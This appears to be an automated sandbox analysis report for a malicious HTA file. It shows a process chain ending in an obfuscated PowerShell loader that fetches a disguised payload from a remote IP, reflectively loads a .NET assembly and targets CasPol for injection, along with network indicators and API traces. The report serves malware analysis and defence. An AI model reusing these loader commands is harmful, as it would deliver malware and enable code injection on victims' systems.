Summary | ZeroBOX

wecaninsertforgoodforeeturncheclkgood.hta

Generic Malware Downloader Antivirus ScreenShot Create Service KeyLogger Internet API HTTP DGA Http API persistence FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential P2P AntiDebug AntiVM
Category Machine Started Completed
FILE s1_win7_x6403_us April 3, 2025, 10:52 a.m. April 3, 2025, 10:54 a.m.
Size 1.8KB
Type HTML document, ASCII text, with CRLF line terminators
MD5 d7a6bc4df00171791fbcbf33763bf5cb
SHA256 1c9aa4fdf425aff58101b6f7e9e10b5b7441da59b42bc13e4a717302edbb53b8
CRC32 0C191830
ssdeep 24:hPgWw2dSATahAXNIQFA+IkWBObbVxhWBtUpJBO5mtLxJfLEypwyezwp3v8yMCO:tgNqSdmNVrFW8c05xQQf8VCO
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\wecaninsertforgoodforeeturncheclkgood.hta

    1932
    • cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\sombrous.bat

      2084
      • wscript.exe wscript //nologo "C:\Windows\Temp\coroclisis.vbs"

        2180
        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#c#Bv#HI#d##g#D0#I##n#HQ#e#B0#C4#Z#Bv#G8#ZwBr#Gw#YwBl#Gg#YwBu#HI#dQB0#GU#ZQBy#G8#ZgBk#G8#bwBn#HI#bwBm#HQ#cgBl#HM#bgBp#G4#YQBj#GU#dw#v#DI#Mg#x#C8#NQ#4#DE#Lg#0#DI#Mg#u#Dk#Lg#2#DE#Mg#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GE#dQBz#HQ#aQBu#Gk#d#Bl#C##PQ#g#CQ#ZQB4#H##bwBy#HQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HY#aQBj#Gk#cwBz#Gk#d#B5#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#Dk#Mg#u#DM#Lg#x#D##MQ#u#DE#N##2#C8#e#Bh#G0#c#Bw#C8#d#Bl#HM#d##v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#C##PQ#g#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#dgBp#GM#aQBz#HM#aQB0#Hk#KQ#7#CQ#e#B5#Gw#bwBn#HI#YQBw#Gg#ZQBk#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#Ck#Ow#k#Gw#YQB1#G4#Z#By#Hk#dwBv#G0#ZQBu#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bj#GE#c#By#G8#bgBp#GM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#RQBs#HY#aQBz#Hk#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#p#Ds#J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bj#GE#c#By#G8#bgBp#GM#KQ#7#CQ#RQBs#HY#aQBz#Hk#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##t#Gc#d##g#CQ#RQBs#HY#aQBz#Hk#Ow#k#EU#b#B2#Gk#cwB5#C##Kw#9#C##J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#C##PQ#g#CQ#cgBl#HM#d#Bv#HI#YQB0#Gk#dgBl#C##LQ#g#CQ#RQBs#HY#aQBz#Hk#Ow#k#H##cgBp#HM#cwBp#GU#cg#g#D0#I##k#Hg#eQBs#G8#ZwBy#GE#c#Bo#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#BF#Gw#dgBp#HM#eQ#s#C##J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#Ck#Ow#k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bw#HI#aQBz#HM#aQBl#HI#KQ#7#CQ#cgBl#Gk#bQBw#HI#aQBz#G8#bgBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##p#Ds#J#Bj#HU#dgBl#G4#YQBu#HQ#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bh#HU#cwB0#Gk#bgBp#HQ#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"

          2396

Name Response Post-Analysis Lookup
pastefy.app 104.21.49.12
IP Address Status Action
104.21.49.12 Active Moloch
164.124.101.2 Active Moloch
192.3.101.146 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49164 -> 104.21.49.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49164
104.21.49.12:443
C=US, O=Google Trust Services, CN=WE1 CN=pastefy.app b6:42:cb:7c:dc:26:c2:f9:e3:e9:9c:47:e7:84:60:7f:b5:bc:66:32

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "Unable to connect to th
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: e remote server"
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:263
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $export = 'txt.doogklcehcnruteerofdoogroftresninacew/221/581.422.9.612//:ptth
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: ';$austinite = $export -replace '#', 't';$vicissity = 'http://192.3.101.146/xam
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: pp/test/new_image.jpg';$watchment = New-Object System.Net.WebClient;$aspermatou
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: s = $watchment.DownloadData <<<< ($vicissity);$xylographed = [System.Text.Encod
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ing]::UTF8.GetString($aspermatous);$laundrywomen = '<<BASE64_START>>';$capronic
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: = '<<BASE64_END>>';$Elvisy = $xylographed.IndexOf($laundrywomen);$restorative
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: = $xylographed.IndexOf($capronic);$Elvisy -ge 0 -and $restorative -gt $Elvisy;$
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: Elvisy += $laundrywomen.Length;$pœcilogenesis = $restorative - $Elvisy;$prissie
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: r = $xylographed.Substring($Elvisy, $pœcilogenesis);$mesotrochal = [System.Conv
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: ert]::FromBase64String($prissier);$reimprisons = [System.Reflection.Assembly]::
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: Load($mesotrochal);$cuvenant = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: object[]] @($austinite,'','','','CasPol','','','','','','','','','','','2',''))
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:329
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $export = 'txt.doogklcehcnruteerofdoogroftresninacew/221/581.422.9.612//:ptth
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: ';$austinite = $export -replace '#', 't';$vicissity = 'http://192.3.101.146/xam
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: pp/test/new_image.jpg';$watchment = New-Object System.Net.WebClient;$aspermatou
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: s = $watchment.DownloadData($vicissity);$xylographed = [System.Text.Encoding]::
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: UTF8.GetString <<<< ($aspermatous);$laundrywomen = '<<BASE64_START>>';$capronic
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: = '<<BASE64_END>>';$Elvisy = $xylographed.IndexOf($laundrywomen);$restorative
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: = $xylographed.IndexOf($capronic);$Elvisy -ge 0 -and $restorative -gt $Elvisy;$
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: Elvisy += $laundrywomen.Length;$pœcilogenesis = $restorative - $Elvisy;$prissie
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: r = $xylographed.Substring($Elvisy, $pœcilogenesis);$mesotrochal = [System.Conv
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: ert]::FromBase64String($prissier);$reimprisons = [System.Reflection.Assembly]::
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: Load($mesotrochal);$cuvenant = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: object[]] @($austinite,'','','','CasPol','','','','','','','','','','','2',''))
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000103
1 1 0

WriteConsoleW

buffer: At line:1 char:438
console_handle: 0x0000010f
1 1 0

WriteConsoleW

buffer: + $export = 'txt.doogklcehcnruteerofdoogroftresninacew/221/581.422.9.612//:ptth
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: ';$austinite = $export -replace '#', 't';$vicissity = 'http://192.3.101.146/xam
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: pp/test/new_image.jpg';$watchment = New-Object System.Net.WebClient;$aspermatou
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: s = $watchment.DownloadData($vicissity);$xylographed = [System.Text.Encoding]::
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: UTF8.GetString($aspermatous);$laundrywomen = '<<BASE64_START>>';$capronic = '<<
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: BASE64_END>>';$Elvisy = $xylographed.IndexOf <<<< ($laundrywomen);$restorative
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: = $xylographed.IndexOf($capronic);$Elvisy -ge 0 -and $restorative -gt $Elvisy;$
console_handle: 0x00000163
1 1 0

WriteConsoleW

buffer: Elvisy += $laundrywomen.Length;$pœcilogenesis = $restorative - $Elvisy;$prissie
console_handle: 0x0000016f
1 1 0

WriteConsoleW

buffer: r = $xylographed.Substring($Elvisy, $pœcilogenesis);$mesotrochal = [System.Conv
console_handle: 0x0000017b
1 1 0

WriteConsoleW

buffer: ert]::FromBase64String($prissier);$reimprisons = [System.Reflection.Assembly]::
console_handle: 0x00000187
1 1 0

WriteConsoleW

buffer: Load($mesotrochal);$cuvenant = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: object[]] @($austinite,'','','','CasPol','','','','','','','','','','','2',''))
console_handle: 0x0000019f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx
console_handle: 0x000001ab
1 1 0

WriteConsoleW

buffer: ception
console_handle: 0x000001b7
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eade8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eaf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eaf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eaf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ea6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ea6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ea6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ea6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ea6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ea6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eaf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eaf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eaf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb1a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb1a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb1a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eab28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb1a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb1a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb1a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb1a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb1a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb1a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb1a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb3a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eae28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eae28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ea8e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ea8e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ea8e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ea8e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ea8e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ea8e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET https://pastefy.app/SXZ0OaCN/raw
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 1769472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02710000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2396
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2396
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02881000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02882000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0260a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0261b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02617000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02602000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02615000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0260c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0261c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02603000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02604000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02605000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02606000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02607000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02608000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
